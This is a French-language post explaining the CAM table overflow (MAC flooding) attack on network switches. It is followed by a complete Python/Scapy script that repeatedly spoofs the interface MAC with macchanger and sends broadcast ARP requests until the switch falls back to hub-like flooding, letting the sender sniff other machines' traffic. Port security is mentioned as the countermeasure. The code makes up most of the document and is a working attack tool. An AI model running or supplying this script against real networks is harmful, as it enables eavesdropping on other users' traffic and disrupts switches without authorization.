CAM Table Overflow



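Un switch enregistre les adresses MAC et les ports correspondants dans une table appelée table CAM (Content Addressable Memory) afin d'acheminer chaque trame vers le bon port. Cependant, si cette table est pleine (overflow), le switch adopte un comportement différent afin d'économiser ses ressources : il ne peut plus apprendre de nouvelles adresses et se comporte comme un simple hub, en diffusant sur tous ses ports les trames dont la destination lui est inconnue, ce qui nous permet de recevoir le trafic des autres machines. Ce comportement dépend du modèle de switch ; la fonction « port security », qui limite le nombre d'adresses MAC apprises par port, est la contre-mesure habituelle.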

Pour ce faire, j'ai programmé un petit script Python utilisant Scapy qui exécute cette attaque.

#!/usr/bin/python
#Author: Storn
#
#Flood the switch's CAM table with a lot of fake MAC addresses,
#which drives the switch into hub mode, then go sniff :p
#
#Use MacChanger and Scapy
#
#argv[1] = interface name
#argv[2] = number of loop iterations (endless loop by default)
#

from scapy.all import *
import random
import sys
import os

# Random Mac Adress
def mac_gen():
    """Return a random MAC address string.

    The result is six colon-separated pairs of lowercase hexadecimal
    digits, e.g. "3f:a0:1c:9e:07:b2" (constructed sample). Each digit is
    drawn independently with random.randint(0, 15).
    """
    digits = "0123456789abcdef"
    octets = []
    for _ in range(6):
        # Two draws per octet, left digit first.
        pair = "".join(digits[random.randint(0, 15)] for _ in range(2))
        octets.append(pair)
    return ":".join(octets)


# Random IP Adress
def ip_gen():
    """Return a random dotted-quad IPv4 address string.

    Each of the four octets is drawn independently with
    random.randint(0, 255), so any value from "0.0.0.0" to
    "255.255.255.255" can come out; no range is excluded.
    """
    octets = (str(random.randint(0, 255)) for _ in range(4))
    return ".".join(octets)


# Send ARP packet
def send_packet(src_mac, src_ip, dst_ip, intface):
    """Send one broadcast ARP who-has request on *intface*.

    The ARP payload carries *src_mac* / *src_ip* as sender and asks for
    *dst_ip*. The Ethernet header only sets the broadcast destination;
    the Ethernet source is not set here.
    NOTE(review): presumably Scapy fills the Ethernet source from the
    interface, which would be why the caller changes the interface MAC
    before each send. Confirm against Scapy's defaults.
    """
    broadcast = "ff:ff:ff:ff:ff:ff"
    request = ARP(op="who-has", psrc=src_ip, pdst=dst_ip, hwsrc=src_mac, hwdst=broadcast)
    frame = Ether(dst=broadcast) / request

    sendp(frame, iface=intface)

# Mac spoofing
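def mac_spoof(mac_addr, intface):
    """Set the MAC address of *intface* to *mac_addr*.

    The interface is brought down with ifconfig, re-addressed with
    macchanger, then brought back up.

    Each command is run from an argument list rather than a concatenated
    shell string: *intface* comes straight from argv and the script
    needs root to change a MAC address, so shell metacharacters in either
    argument must never reach a shell.

    Exit statuses are not checked. OSError propagates if ifconfig or
    macchanger cannot be executed.
    """
    import subprocess  # local import keeps the file's import block untouched

    subprocess.call(["ifconfig", intface, "down"])
    subprocess.call(["macchanger", "-m", mac_addr, intface])
    subprocess.call(["ifconfig", intface, "up"])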

# Main
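if __name__ == "__main__":
    # Entry point. argv[1] is the interface; the optional argv[2] is the
    # number of frames to send (without it the loop runs until a send
    # fails or the process is interrupted).
    #
    # What this looks like from the network side: every iteration bounces
    # the interface (down / new MAC / up) and emits one broadcast ARP
    # request, so a single access port shows repeated link flaps and a
    # stream of never-before-seen source MACs. A per-port limit on learned
    # MAC addresses (port security) cuts this off at the switch.

    os.system("clear")

    if len(sys.argv) < 2:
        print(sys.argv[0] + " <Iface> <Loop or Endless loop by default>")
        sys.exit()

    iface = sys.argv[1]
    # Parse the count once instead of on every loop test; None = endless.
    limit = int(sys.argv[2]) if len(sys.argv) >= 3 else None

    sent = 0
    # "<" rather than "!=" so a zero or negative count ends immediately
    # instead of looping forever.
    while limit is None or sent < limit:
        srcmac = mac_gen()
        srcip = ip_gen()
        dstip = ip_gen()
        try:
            mac_spoof(srcmac, iface)
            send_packet(srcmac, srcip, dstip, iface)
        except Exception:
            # Despite the "Retry" wording, the script stops at the first
            # failure. KeyboardInterrupt/SystemExit are not swallowed.
            print("\n[!] Can't Send ARP packet... Retry...\n")
            sys.exit()
        else:
            print("\n\n[*] " + srcmac + " > ff:ff:ff:ff:ff:ff")
            print("\n    Who has " + dstip + "? Tell " + srcip + "\n")
        sent += 1

    if limit is not None:
        print("\n\n[+] Attack Completed with " + str(sys.argv[2]) + " Packets\n")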